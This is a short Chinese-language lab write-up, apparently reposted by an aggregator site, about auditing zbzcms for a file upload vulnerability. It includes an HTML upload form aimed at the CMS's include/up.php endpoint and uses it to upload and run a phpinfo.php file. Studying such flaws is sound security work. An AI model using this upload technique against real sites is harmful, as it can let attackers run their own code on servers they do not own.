代码审计之文件上传漏洞实验
Posted 哇哇**
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了代码审计之文件上传漏洞实验相关的知识,希望对你有一定的参考价值。
一、phpstudy搭建zbzcms.com网站
二、使用seay源代码审计工具
1.进行自动审计,发现可疑文件上传的漏洞
2.双击打开,分析代码,添加变量输出$_FILES
添加代码如下:var_dump($_FILES);
3.在网站根目录下新建html文件内容如下
<html>
<head>
<meta charset="utf-8">
<title>xxx</title>
</head>
<body>
<form action="http://zbzcms:8002/cms/cms/include/up.php?run=file&path=./" method="post" enctype="multipart/form-data">
<label for="file">文件名:</label>
<input type="file" name="file" id="file"><br>
<input type="submit" name="submit" value="提交">
</form>
</body>
</html>
此处改成自己正确的url
4.用浏览器访问html文件,上传phpinfo.php文件
返回出路径
5.访问路径,文件解析成功!
以上是关于代码审计之文件上传漏洞实验的主要内容,如果未能解决你的问题,请参考以下文章